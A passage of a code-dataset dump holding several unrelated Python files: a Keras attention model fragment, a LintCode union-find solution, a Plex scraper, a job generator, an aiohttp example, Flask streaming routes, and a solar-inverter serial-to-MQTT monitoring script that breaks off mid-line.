tf.keras.layers.BatchNormalization(**option_dict_bn)(f)\n\n    f = tf.keras.layers.UpSampling2D()(f)\n    z = attention_3d_block_and_concate(f)\n\n    y = tf.keras.layers.concatenate([a, f, z], axis=3)\n\n    y = tf.keras.layers.Convolution2D(64, 3, **option_dict_conv)(y)\n    y = tf.keras.layers.BatchNormalization(**option_dict_bn)(y)\n\n    y = tf.keras.layers.Convolution2D(64, 3, **option_dict_conv)(y)\n    y = tf.keras.layers.BatchNormalization(**option_dict_bn)(y)\n\n    return [x, y]\n\n\ndef get_model_3_class(dim1, dim2, activation=\"softmax\"):\n\n    [x, y] = get_core(dim1, dim2)\n\n    y = tf.keras.layers.Convolution2D(3, 1, **option_dict_conv)(y)\n\n    if activation is not None:\n        y = tf.keras.layers.Activation(activation)(y)\n\n    model = tf.keras.models.Model(x, y)\n\n    return model\n","sub_path":"utils/fixed_att_SWnet_v3.py","file_name":"fixed_att_SWnet_v3.py","file_ext":"py","file_size_in_byte":5662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"182826685","text":"\"\"\"\n
805. Maximum Association Set\nhttps://www.lintcode.com/problem/maximum-association-set/description\n\nExample 1:\n\tInput: ListA = [\"abc\",\"abc\",\"abc\"], ListB = [\"bcd\",\"acd\",\"def\"]\n\tOutput: [\"abc\",\"acd\",\"bcd\",\"def\"]\n\tExplanation:\n\tabc is associated with bcd, acd, def, so the largest set is the set of all books\n\nEasier method: build the list of children afterwards.\n\"\"\"\nclass Solution:\n    \"\"\"\n    @param ListA: The relation between ListB's books\n    @param ListB: The relation between ListA's books\n    @return: The answer\n    \"\"\"\n    def maximumAssociationSet(self, ListA, ListB):\n        n = len(ListA)\n        if len(ListB) != n:\n            return -1\n\n        self.father = {}\n\n        for i in range(n):\n            if ListA[i] not in self.father:\n                self.father[ListA[i]] = ListA[i]\n            if ListB[i] not in self.father:\n                self.father[ListB[i]] = ListB[i]\n            self.union(ListA[i], ListB[i])\n\n        children = {}  # root father -> the set of its children\n        for key in self.father:\n            root_id = self.find(key)\n            children[root_id] = children.get(root_id, set())\n            children[root_id].add(key)\n\n        max_set = set()\n        for root_father, child_list in children.items():\n            if len(child_list) > len(max_set):\n                max_set = child_list\n        return list(max_set)\n\n    def union(self, a, b):\n        a_father = self.find(a)\n        b_father = self.find(b)\n        if a_father == b_father:\n            return\n\n        self.father[a_father] = b_father\n\n    def find(self, x):\n        if self.father[x] == x:\n            return x\n        self.father[x] = self.find(self.father[x])\n        return self.father[x]\n","sub_path":"lintcode/805.1.py","file_name":"805.1.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"283007291","text":"# -*- coding: utf-8 -*-\n# This class is for subcategories on pages like Bolibompa.\n# Do not confuse these with the main categories accessible from the root page.\n\nfrom common import *\n\nclass CategoryInfo:\n    def __init__(self):\n        self.url = None\n        self.thumbUrl = None\n        self.name = None\n\n    def GetMediaItems(self):\n        pages = GetPaginatePages(self.url, \"sb\")\n        epUrls = []\n        for page in pages:\n            epUrls = epUrls + GetEpisodeUrlsFromPage(page)\n\n        epList = []\n        for epUrl in epUrls:\n            epInfo = GetEpisodeInfo(epUrl)\n            epList.append(epInfo.GetMediaItem())\n        return epList\n\n\ndef GetCategoryContents(ci):\n    list = ObjectContainer(title2=ci.name)\n    list += ci.GetMediaItems()\n    return list\n\n\ndef GetCategoryInfosFromPage(url):\n    Log(\"GetCategoryUrlsFromPage: %s\" % url)\n    catUrls = []\n    pageElement = None\n    try:\n        pageElement = HTML.ElementFromURL(url, cacheTime=CACHE_TIME_1DAY)\n    except:\n        Log(\"page fetch failed\")\n        return None\n\n    catInfoList = []\n    catElems = pageElement.xpath(\"//div[@id='sb']//div[@class='content']//li/a[@class='folder overlay tooltip']/..\")\n    for catElem in catElems:\n        catName = catElem.xpath(\".//span/text()\")[0]\n        catUrl = url + catElem.xpath(\".//a/@href\")[0]\n        catThumbUrl = catElem.xpath(\".//a//img[@class='folder-thumb']/@src\")[0]\n        Log(\"CatName: %s\" % catName)\n        Log(\"CatUrl: %s\" % catUrl)\n        Log(\"CatThumbUrl: %s\" % catThumbUrl)\n        ci = CategoryInfo()\n        ci.name = catName\n        ci.url = catUrl\n        ci.thumbUrl = catThumbUrl\n        catInfoList.append(ci)\n\n    return catInfoList\n","sub_path":"Contents/Code/category.py","file_name":"category.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"216272899","text":"#!/usr/bin/env python3\n
\nimport sys, os, fileinput\n\n\ndef readLines(fileName):\n    try:\n        with open(fileName, \"r\") as h:\n            lines = h.readlines()\n        return lines\n    except IOError as e:\n        sys.stderr.write(\"ERROR: Cannot read the file %s\\n\" % fileName)\n        raise SystemExit\n\n\nif __name__ == \"__main__\":\n\n    if len(sys.argv) < 3:\n        print(\"Job call generator. (c) 2013 Julian Wergieluk.\")\n        print(\"Usage: %s job-name argument-file\" % sys.argv[0])\n        sys.exit()\n\n    job_name = os.path.abspath(sys.argv[1])\n\n    args = readLines(sys.argv[2])\n\n    try:\n        for arg in args:\n            sys.stdout.write(\"%s %s %s\\n\" % (job_name, arg.strip(), \" \".join(sys.argv[3:])))\n    except IOError as e:\n        pass\n","sub_path":"eex/gen-jobs.py","file_name":"gen-jobs.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"269971433","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# author: bigfoolliu\n\n\n\"\"\"\nBasic aiohttp usage\n\nClient example\n\nhttps://docs.aiohttp.org/en/stable/\n\"\"\"\n\nimport asyncio\nimport aiohttp\n\nurl = 'http://python.org'\n\n\nasync def main():\n    async with aiohttp.ClientSession() as session:\n        async with session.get(url) as response:\n            print(f'status: {response.status}')\n            print(f'content-type: {response.headers.get(\"content-type\")}')\n\n            html = await response.text()\n            print(f'body: {html[0:10]} ...')\n\n\nif __name__ == '__main__':\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(main())\n","sub_path":"language/python/modules/Web/aiohttp/aiohttp_module_client.py","file_name":"aiohttp_module_client.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"563891034","text":"\"\"\"Logged-in page routes.\"\"\"\nfrom flask import Blueprint, render_template, redirect, url_for\nfrom flask_login import current_user, login_required, logout_user\n\nimport time\nfrom flask import Response\n\n# Blueprint Configuration\nmain_bp = Blueprint('main_bp', __name__,\n                    template_folder='templates',\n                    static_folder='static')\n\n\n@main_bp.route('/', methods=['GET'])\n@login_required\ndef dashboard():\n    \"\"\"Logged-in User Dashboard.\"\"\"\n    return render_template('dashboard.jinja2',\n                           title='Flask-Login Tutorial.',\n                           template='dashboard-template',\n                           current_user=current_user,\n                           body=\"You are now logged in, see <a href=\\\"video_feed\\\">video!</a>\")\n\n\n@main_bp.route(\"/logout\")\n@login_required\ndef logout():\n    \"\"\"User log-out logic.\"\"\"\n    logout_user()\n    return redirect(url_for('auth_bp.login'))\n\n\n@main_bp.route('/video_feed')\ndef video_feed():\n    \"\"\"Video streaming route. Put this in the src attribute of an img tag.\"\"\"\n    if not current_user.is_authenticated:\n        return redirect(url_for('auth_bp.login'))\n\n    return Response(gen(),\n                    mimetype='multipart/x-mixed-replace; boundary=frame')\n
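\n# Note (added for clarity; not in the original file): every chunk that\n# gen() yields below is one JPEG frame framed by the b'--frame' marker,\n# which must match the boundary declared in the multipart mimetype above.\n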
\n\ndef gen():\n    \"\"\"Video streaming generator function.\"\"\"\n    i = 0\n    while True:\n        path = \"files/IMG\" + str(i) + \".jpg\"\n        with open(path, 'rb') as f:\n            image = f.read()\n        i = i + 1\n        if i > 3:\n            i = 0\n\n        yield (b'--frame\\r\\n'\n               b'Content-Type: image/jpeg\\r\\n\\r\\n' + image + b'\\r\\n')\n\n        time.sleep(0.2)\n","sub_path":"extensions/iocloud/login/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"145742667","text":"#!/usr/bin/python3\r\n\r\nimport paho.mqtt.client as mqtt\r\nimport serial\r\nimport time\r\n\r\n#broker = 'www.mqtt-dashboard.com'\r\nbroker = 'localhost'\r\ntopic = 'my_solar'\r\n\r\n\r\n# COMMANDS + CRC16 SENT TO THE INVERTER\r\n\r\nQPIGS = [0x51,0x50,0x49,0x47,0x53,0xB7,0xA9,0x0D] # Device general status parameters inquiry\r\nQMCHGCR = [0x51,0x4D,0x43,0x48,0x47,0x43,0x52,0xD8,0x55,0x0D] # Enquiry selectable value about max charging current\r\nQMUCHGCR = [0x51,0x4D,0x55,0x43,0x48,0x47,0x43,0x52,0x26,0x34,0x0D] # Enquiry selectable value about max utility charging current\r\nQPIWS = [0x51,0x50,0x49,0x57,0x53,0xB4,0xDA,0x0D] # Device Warning Status inquiry\r\nQMOD = [0x51,0x4D,0x4F,0x44,0x49,0xC1,0x0D] # Device Mode inquiry\r\nQID = [0x51,0x49,0x44,0xD6,0xEA,0x0D] # The device serial number inquiry\r\nQDI = [0x51,0x44,0x49,0x71,0x1B,0x0D] # The default setting value information\r\nQVFW = [0x51,0x56,0x46,0x57,0x62,0x99,0x0D] # Main CPU Firmware version inquiry\r\nQVFW2 = [0x51,0x56,0x46,0x57,0x32,0xC3,0xF5,0x0D] # Another CPU Firmware version inquiry\r\n\r\nQPIRI = [0x51,0x50,0x49,0x52,0x49,0xF8,0x54,0x0D] # Device Rating Information inquiry\r\n\r\nQFLAG = [0x51,0x46,0x4C,0x41,0x47,0x98,0x74,0x0D] # Device flag status inquiry\r\nACK = [0x41,0x43,0x4B,0x39,0x20,0x0D] # Device response\r\nPOP = {'UTI':[0x50,0x4F,0x50,0x30,0x30,0xC2,0x48,0x0D], # Setting device output source priority to UTI\r\n       'SOL':[0x50,0x4F,0x50,0x30,0x31,0xD2,0x69,0x0D], # Setting device output source priority to SOL\r\n       'SBU':[0x50,0x4F,0x50,0x30,0x32,0xE2,0x0B,0x0D]  # Setting device output source priority to SBU\r\n      }\r\nPCP = {'UTI':[0x50,0x43,0x50,0x30,0x30,0x8D,0x7A,0x0D],     # Setting device charger priority to UTI first\r\n       'SOL':[0x50,0x43,0x50,0x30,0x31,0x9D,0x5B,0x0D],     # Setting device charger priority to SOL first\r\n       'SOL+UTI':[0x50,0x43,0x50,0x30,0x32,0xAD,0x38,0x0D], # Setting device charger priority to SOL+UTI\r\n       'OnlySOL':[0x50,0x43,0x50,0x30,0x33,0xBD,0x19,0x0D]  # Setting device charger priority to OnlySOL\r\n      }\r\nPGR = {'APP':[0x50,0x47,0x52,0x30,0x30,0x29,0xEB,0x0D], # Setting device grid working range to APP\r\n       'UPS':[0x50,0x47,0x52,0x30,0x31,0x39,0xCA,0x0D]  # Setting device grid working range to UPS\r\n      }\r\n
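# Frame layout (inferred from the byte tables above, added as a note):\r\n# every command is the ASCII command text, the two crc16() bytes of that\r\n# text, then a trailing 0x0D. The ' <crc> ' placeholders in the PSDV and\r\n# PBDV tables below still need their CRC bytes filled in before those\r\n# commands can be sent.\r\n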
PBCV = {'44.0':[0x50,0x42,0x43,0x56,0x34,0x34,0x2E,0x30,0xE6,0xEB,0x0D], # Set battery re-charge voltage to 44.0 V\r\n        '45.0':[0x50,0x42,0x43,0x56,0x34,0x35,0x2E,0x30,0xD1,0xDB,0x0D], # Set battery re-charge voltage to 45.0 V\r\n        '46.0':[0x50,0x42,0x43,0x56,0x34,0x36,0x2E,0x30,0x88,0x8B,0x0D], # Set battery re-charge voltage to 46.0 V\r\n        '47.0':[0x50,0x42,0x43,0x56,0x34,0x37,0x2E,0x30,0xBF,0xBB,0x0D], # Set battery re-charge voltage to 47.0 V\r\n        '48.0':[0x50,0x42,0x43,0x56,0x34,0x38,0x2E,0x30,0x93,0x8A,0x0D], # Set battery re-charge voltage to 48.0 V\r\n        '49.0':[0x50,0x42,0x43,0x56,0x34,0x39,0x2E,0x30,0xA4,0xBA,0x0D], # Set battery re-charge voltage to 49.0 V\r\n        '50.0':[0x50,0x42,0x43,0x56,0x35,0x30,0x2E,0x30,0x4C,0x9F,0x0D], # Set battery re-charge voltage to 50.0 V\r\n        '51.0':[0x50,0x42,0x43,0x56,0x35,0x31,0x2E,0x30,0x7B,0xAF,0x0D]  # Set battery re-charge voltage to 51.0 V\r\n       }\r\nPSDV = {'40.0':'\\x50\\x53\\x44\\x56\\x34\\x30\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 40.0 V\r\n        '41.0':'\\x50\\x53\\x44\\x56\\x34\\x31\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 41.0 V\r\n        '42.0':'\\x50\\x53\\x44\\x56\\x34\\x32\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 42.0 V\r\n        '43.0':'\\x50\\x53\\x44\\x56\\x34\\x33\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 43.0 V\r\n        '44.0':'\\x50\\x53\\x44\\x56\\x34\\x34\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 44.0 V\r\n        '45.0':'\\x50\\x53\\x44\\x56\\x34\\x35\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 45.0 V\r\n        '46.0':'\\x50\\x53\\x44\\x56\\x34\\x36\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 46.0 V\r\n        '47.0':'\\x50\\x53\\x44\\x56\\x34\\x37\\x2E\\x30 <crc> \\x0D', # Set battery under voltage to 47.0 V\r\n        '48.0':'\\x50\\x53\\x44\\x56\\x34\\x38\\x2E\\x30 <crc> \\x0D'  # Set battery under voltage to 48.0 V\r\n       }\r\n# note: the original PBDV entries for 49.0-58.0 V carried the PSDV byte\r\n# prefix \\x50\\x53\\x44\\x56; corrected here to the PBDV prefix \\x50\\x42\\x44\\x56\r\nPBDV = {'48.0':'\\x50\\x42\\x44\\x56\\x34\\x38\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 48.0 V\r\n        '49.0':'\\x50\\x42\\x44\\x56\\x34\\x39\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 49.0 V\r\n        '50.0':'\\x50\\x42\\x44\\x56\\x35\\x30\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 50.0 V\r\n        '51.0':'\\x50\\x42\\x44\\x56\\x35\\x31\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 51.0 V\r\n        '52.0':'\\x50\\x42\\x44\\x56\\x35\\x32\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 52.0 V\r\n        '53.0':'\\x50\\x42\\x44\\x56\\x35\\x33\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 53.0 V\r\n        '54.0':'\\x50\\x42\\x44\\x56\\x35\\x34\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 54.0 V\r\n        '55.0':'\\x50\\x42\\x44\\x56\\x35\\x35\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 55.0 V\r\n        '56.0':'\\x50\\x42\\x44\\x56\\x35\\x36\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 56.0 V\r\n        '57.0':'\\x50\\x42\\x44\\x56\\x35\\x37\\x2E\\x30 <crc> \\x0D', # Set battery re-discharge voltage to 57.0 V\r\n        '58.0':'\\x50\\x42\\x44\\x56\\x35\\x38\\x2E\\x30 <crc> \\x0D'  # Set battery re-discharge voltage to 58.0 V\r\n       }\r\n\r\n\r\ndevice_serial = 'xxxxxxxxxxxxxx'\r\ncmd = ''\r\nset_time = 30      # inverter polling period, s\r\nst_read = 0\r\ninfo_rd = False\r\nser_state = False\r\nmqtt_connect = False\r\n\r\n\r\n# ================== CRC16 CALCULATION ====================\r\n# CRC16 computed with the CRC-CCITT (XModem) algorithm\r\n# https://bytes.com/topic/python/insights/887357-python-check-crc-frame-crc-16-ccitt\r\n# CRC-16-CITT poly, the CRC scheme used by the ymodem protocol\r\n# 16bit operation register, initialized to zeros\r\n# message - the data bytes the CRC is calculated for\r\n# the function returns the two CRC16 bytes\r\n\r\ndef crc16(message):\r\n    poly = 0x1021\r\n    reg = 0\r\n    message += b'\\x00\\x00'\r\n    for byte in message:\r\n        mask = 0x80\r\n        while mask > 0:\r\n            reg <<= 1\r\n            if byte & mask:\r\n                reg += 1\r\n            mask >>= 1\r\n            if reg > 0xffff:\r\n                reg &= 0xffff\r\n                reg ^= poly\r\n    crc_h = reg >> 8\r\n    crc_l = reg & 0xFF\r\n    return bytes([crc_h, crc_l])\r\n
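\r\n# Quick self-check (illustrative, not from the original script): the CRC\r\n# bytes for b'QPIGS' are 0xB7 0xA9 -- the same two bytes embedded in the\r\n# QPIGS command table at the top of this file.\r\n# >>> crc16(b'QPIGS')\r\n# b'\\xb7\\xa9'\r\n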
\r\n\r\n# ======== TALKING TO THE INVERTER OVER THE COM PORT =========\r\n# open the COM port, send a request to the inverter and read its reply\r\n# msg_wr   - the bytes to send to the inverter over the COM port\r\n# length   - the number of bytes received from the inverter\r\n# data     - the payload received from the inverter\r\n# rd_crc   - the 2 CRC16 bytes received from the inverter\r\n# calc_crc - the 2 CRC16 bytes computed over the received payload\r\n# crc_ok   - True when the received data can be trusted\r\n# the function returns a tuple: <data>, <length>, <crc_ok>\r\n# if opening the COM port fails or the reply is corrupted,\r\n# the outputs are zeroed out\r\n\r\ndef comm_inverter(msg_wr):\r\n\r\n    # - initialise the outputs\r\n    global ser_state\r\n    ser_state = False\r\n    crc_ok = False\r\n    data = ''\r\n    length = 0\r\n\r\n    # - open the COM port\r\n    try:\r\n        # --- for testing the script on a PC ---\r\n        # ser = serial.Serial(\r\n        #     port='COM3',\r\n        #     baudrate=2400,\r\n        #     parity=serial.PARITY_NONE,\r\n        #     stopbits=serial.STOPBITS_ONE,\r\n        #     bytesize=serial.EIGHTBITS,\r\n        #     timeout=1\r\n        # )\r\n        # --------------------------------------\r\n        ser = serial.Serial(\r\n            port='/dev/ttyAMA0',\r\n            baudrate=2400,\r\n            parity=serial.PARITY_NONE,\r\n            stopbits=serial.STOPBITS_ONE,\r\n            bytesize=serial.EIGHTBITS,\r\n            timeout=1\r\n        )\r\n\r\n    # - the COM port could not be opened\r\n    except serial.SerialException:\r\n        print('COM port not found\\n\\r')\r\n        data = ''\r\n        length = 0\r\n        crc_ok = False\r\n\r\n    # - port opened successfully - exchange data with the inverter\r\n    else:\r\n        ser_state = True\r\n        # ser.flushInput()   # clear the input buffer\r\n        # ser.flushOutput()  # clear the output buffer\r\n        # time.sleep(0.1)\r\n\r\n        # - send the request\r\n        ser.write(bytearray(msg_wr))\r\n        time.sleep(0.5)\r\n\r\n        # - read the reply and check its CRC\r\n        msg_rd = ser.readline()\r\n        length = len(msg_rd)\r\n        data = msg_rd[:-3]\r\n        rd_crc = msg_rd[-3:-1]\r\n        calc_crc = crc16(data)\r\n        print('Write to INVERTER', bytes(msg_wr))\r\n        print('Read from INVERTER', length, 'byte :', msg_rd)\r\n        crc_ok = rd_crc == calc_crc\r\n        if crc_ok:\r\n            data = data.decode()\r\n        else:\r\n            print('----- CRC error -----')\r\n            data = ''\r\n\r\n    # - return values of the exchange\r\n    finally:\r\n        return data, length, crc_ok\r\n\r\n\r\n# == CONNECTING TO THE MQTT BROKER AND SUBSCRIBING TO TOPICS ==\r\n# client   - the client instance for this callback\r\n# userdata - the private user data set for the client\r\n# flags    - response flags sent by the broker\r\n# rc       - the connection result code:\r\n#   0: Connection successful\r\n#   1: Connection refused - incorrect protocol version\r\n#   2: Connection refused - invalid client identifier\r\n#   3: Connection refused - server unavailable\r\n#   4: Connection refused - bad username or password\r\n#   5: Connection refused - not authorised\r\n#   6-255: Currently unused.\r\n\r\ndef on_connect(client, userdata, flags, rc):\r\n    global mqtt_connect\r\n    mqtt_connect = True\r\n    print('Connected...', 'CLIENT:', client, 'USERDATA:', userdata, 'FLAGS:', flags, 'CODE =', rc)\r\n    client.subscribe(topic + '/#')\r\n\r\n\r\n
def on_disconnect(client, userdata, rc):\r\n    global mqtt_connect\r\n    mqtt_connect = False\r\n    print('Disconnect ', 'CLIENT:', client, 'CODE = ', rc)\r\n\r\n\r\n# == RECEIVING COMMANDS FROM THE MQTT BROKER AND PASSING THEM TO THE INVERTER ==\r\n# client - the client instance, userdata - private user data\r\n# msg - the received message:\r\n#   msg.topic   - the topic\r\n#   msg.payload - the message body\r\n#   msg.qos     - quality of service\r\n# a message arriving on a subscribed topic is interpreted as a command\r\n# for the inverter and sent to it over the COM port; the acknowledgement\r\n# received from the inverter is published back to the MQTT broker\r\n\r\ndef on_message(client, userdata, msg):\r\n    cmd = msg.payload.decode()\r\n\r\n    # - inverter polling period, s\r\n    if msg.topic == topic + '/set/period_s':\r\n        global set_time\r\n        set_time = int(cmd)\r\n\r\n    # commands are forwarded to the inverter only after its settings have\r\n    # been read at least once (info_rd is set by the QPIRI poll below)\r\n    if info_rd:\r\n\r\n        # - SET device source range\r\n        if msg.topic == topic + '/set/device_source_range' and cmd != source_range:\r\n            try:\r\n                reply = comm_inverter(PGR[cmd])  # 'PGR' + <cmd> + <crc16>\r\n                data = reply[0]\r\n                length = reply[1]\r\n                crc_ok = reply[2]\r\n                set_source_range = (data == '(ACK' and crc_ok)\r\n            except:\r\n                set_source_range = False\r\n            finally:\r\n                client.publish(topic + '/ack/device_source_range', set_source_range, 0)\r\n\r\n        # - SET source priority\r\n        if msg.topic == topic + '/set/source_priority' and cmd != source_priority:\r\n            try:\r\n                reply = comm_inverter(POP[cmd])  # 'POP' + <cmd> + <crc16>\r\n                data = reply[0]\r\n                length = reply[1]\r\n                crc_ok = reply[2]\r\n                set_source_priority = (data == '(ACK' and crc_ok)\r\n            except:\r\n                set_source_priority = False\r\n            finally:\r\n                client.publish(topic + '/ack/source_priority', set_source_priority, 0)\r\n\r\n        # - SET charger priority\r\n        if msg.topic == topic + '/set/charger_priority' and cmd != charger_priority:\r\n            try:\r\n                reply = comm_inverter(PCP[cmd])  # 'PCP' + <cmd> + <crc16>\r\n                data = reply[0]\r\n                length = reply[1]\r\n                crc_ok = reply[2]\r\n                set_charger_priority = (data == '(ACK' and crc_ok)\r\n            except:\r\n                set_charger_priority = False\r\n            finally:\r\n                client.publish(topic + '/ack/charger_priority', set_charger_priority, 0)\r\n
\r\n        # - SET batt recharge voltage\r\n        if msg.topic == topic + '/set/batt_recharge_voltage':\r\n            value = '{:0>4.1f}'.format(float(cmd))  # render <cmd> as a number in XX.X form\r\n            if batt_recharge_voltage != value:\r\n                try:\r\n                    reply = comm_inverter(PBCV[value])  # 'PBCV' + <value> + <crc16>\r\n                    data = reply[0]\r\n                    length = reply[1]\r\n                    crc_ok = reply[2]\r\n                    set_batt_recharge_voltage = (data == '(ACK' and crc_ok)\r\n                except:\r\n                    set_batt_recharge_voltage = False\r\n                finally:\r\n                    client.publish(topic + '/ack/batt_recharge_voltage', set_batt_recharge_voltage, 0)\r\n\r\n        # - SET batt under voltage\r\n        if msg.topic == topic + '/set/batt_under_voltage':\r\n            value = '{:0>4.1f}'.format(float(cmd))\r\n            if batt_under_voltage != value:\r\n                try:\r\n                    reply = comm_inverter(PSDV[value])  # 'PSDV' + <value> + <crc16>\r\n                    data = reply[0]\r\n                    length = reply[1]\r\n                    crc_ok = reply[2]\r\n                    set_batt_under_voltage = (data == '(ACK' and crc_ok)\r\n                except:\r\n                    set_batt_under_voltage = False\r\n                finally:\r\n                    client.publish(topic + '/ack/batt_under_voltage', set_batt_under_voltage, 0)\r\n\r\n        # - SET batt redischarge voltage\r\n        if msg.topic == topic + '/set/batt_redischarge_voltage':\r\n            value = '{:0>4.1f}'.format(float(cmd))\r\n            if batt_redischarge_voltage != value:\r\n                try:\r\n                    reply = comm_inverter(PBDV[value])  # 'PBDV' + <value> + <crc16>\r\n                    data = reply[0]\r\n                    length = reply[1]\r\n                    crc_ok = reply[2]\r\n                    set_batt_redischarge_voltage = (data == '(ACK' and crc_ok)\r\n                except:\r\n                    set_batt_redischarge_voltage = False\r\n                finally:\r\n                    client.publish(topic + '/ack/batt_redischarge_voltage', set_batt_redischarge_voltage, 0)\r\n\r\n\r\n# ===== CONFIRMATION OF A PUBLISH TO THE MQTT BROKER =====\r\n\r\ndef on_publish(client, userdata, mid):\r\n    pass\r\n\r\n\r\n# MQTT CLIENT\r\n\r\n# - Client ID = the inverter serial number\r\n\r\nwhile device_serial == 'xxxxxxxxxxxxxx' and st_read < 3:\r\n    st_read = st_read + 1\r\n    reply = comm_inverter(QID)\r\n    data = reply[0]\r\n    length = reply[1]\r\n    crc_ok = reply[2]\r\n    if crc_ok and length == 26: device_serial = data[1:]\r\n    print(st_read, ':', device_serial)\r\nst_read = 0\r\n\r\n\r\nclient = mqtt.Client(device_serial)\r\ntry:\r\n    client.connect(broker, 1883, 60)\r\nexcept:\r\n    # print('MQTT broker not found!')\r\n    pass\r\nclient.on_connect = on_connect\r\nclient.on_disconnect = on_disconnect\r\nclient.on_message = on_message\r\n# client.on_publish = on_publish\r\nclient.loop_start()\r\n
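\r\n# Topic layout (summarised from the publish/subscribe calls in this file):\r\n#   <topic>/status/... - QPIGS measurements\r\n#   <topic>/mode/...   - QMOD operating mode\r\n#   <topic>/info/...   - QPIRI settings\r\n#   <topic>/alarm/...  - QPIWS warnings and faults\r\n#   <topic>/set/...    - incoming commands (subscribed via <topic>/#)\r\n#   <topic>/ack/...    - command acknowledgements\r\n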
панелей х.хxxx, kW*h\r\n\r\nwhile True :\r\n\r\n cycle = time.time() - time_pre\r\n if cycle >= set_time :\r\n time_pre = time.time()\r\n if mqtt_connect :\r\n #client.publish(topic+'/script_state', True, 0) \r\n \r\n# - параметры инвертора\r\n\r\n grid_voltage = 0.0 # напряжение сети xxx.x, V\r\n grid_frequency = 0.0 # частота сети хх.х, Hz\r\n ac_voltage = 0.0 # выходное напряжение инвертора ххх.х, V\r\n ac_frequency = 0.0 # частота на выходе инвертора хх.х, Hz\r\n ac_va_power = 0 # полная выходная мощность хххх, VA\r\n ac_w_power = 0 # активная выходная мощность хххх, W\r\n #ac_energy = 0 # потребление энергии x.хххх, kW*h \r\n ac_load = 0 # нагрузка инвертора ххх, %\r\n bus_voltage = 0 # напряжение шины постоянного тока ххх, V\r\n batt_voltage = 0.0 # напряжение батареи хх.х, V \r\n batt_charging = 0.0 # ток заряда батареи хх.х, А \r\n batt_capacity = 0 # емкость батареи xxx, %\r\n temp_inverter = 0 # температура инвертора xxxx, T\r\n pv_current = 0 # выходной ток солнечных панелей xxxx, A\r\n pv_voltage = 0.0 # выходное напряжение солнечных панелей xxx.x, V\r\n pv_power = 0.0 # выходная мощность солнечных панелей xxxx.х, W\r\n #pv_energy = 0.0 # энергия солнечных панелей х.хxxx, kW*h \r\n scc_voltage = 0.0 # напряжение заряда от солнечных панелей xx.xx, V\r\n batt_discharge = 0 # разрядный ток от аккумулятора ххх, А\r\n device_status = '00000000' # байт состояния инвертора\r\n load = 0 # нагрузка инвртора\r\n charging = 'unknow' # источник зарядки батареи\r\n charging_status = 0 # Charging On/Off\r\n charging_scc = 0 # Charging with SCC\r\n charging_grid = 0 # Charging with AC grid\r\n comm_state = 'ok' # состояние обмена с инвертором\r\n \r\n reply = comm_inverter(QPIGS)\r\n data = reply[0]\r\n length = reply[1]\r\n crc_ok = reply[2]\r\n print(data, 'len =', length) \r\n if crc_ok and length == 110 : \r\n try:\r\n # для корректного представления в числовом виде на всякий случай предусмотрена замена ',' на '.'\r\n grid_voltage = float(data[1:6].replace(',', '.'))\r\n grid_frequency = float(data[7:11].replace(',', '.'))\r\n ac_voltage = float(data[12:17].replace(',', '.'))\r\n ac_frequency = float(data[18:22].replace(',', '.'))\r\n ac_va_power = int(data[23:27])\r\n ac_w_power = int(data[28:32])\r\n ac_load = int(data[33:36])\r\n bus_voltage = int(data[37:40])\r\n batt_voltage = float(data[41:46].replace(',', '.'))\r\n batt_charging = float(data[47:50].replace(',', '.'))/10.0\r\n batt_capacity = int(data[51:54])\r\n temp_inverter = int(data[55:59])\r\n pv_current = int(data[60:64])\r\n pv_voltage = float(data[65:70].replace(',', '.'))\r\n scc_voltage = float(data[71:76].replace(',', '.'))\r\n batt_discharge = int(data[77:82])\r\n device_status = data[83:91] \r\n load = device_status[3]\r\n charging_status = device_status[5]\r\n charging_scc = device_status[6]\r\n charging_grid = device_status[7]\r\n \r\n if device_status[5:] == '000' : charging = 'NOT charging'\r\n if device_status[5:] == '110' : charging = 'Charging with SCC'\r\n if device_status[5:] == '101' : charging = 'Charging with AC grid'\r\n if device_status[5:] == '111' : charging = 'Charging with SCC + AC grid'\r\n except: \r\n comm_state = 'decryption error'\r\n else: \r\n if ser_state : comm_state = 'read error'\r\n else : comm_state = 'COM-port error'\r\n\r\n ac_energy = round(((ac_energy_pre + float(ac_w_power * cycle / 3600000.0)) / 2), 4) # расчет потребления энергии за период опроса инвертора\r\n ac_energy_pre = float(ac_w_power * cycle / 3600000.0)\r\n pv_power = round(float(pv_current * pv_voltage),2)\r\n pv_energy 
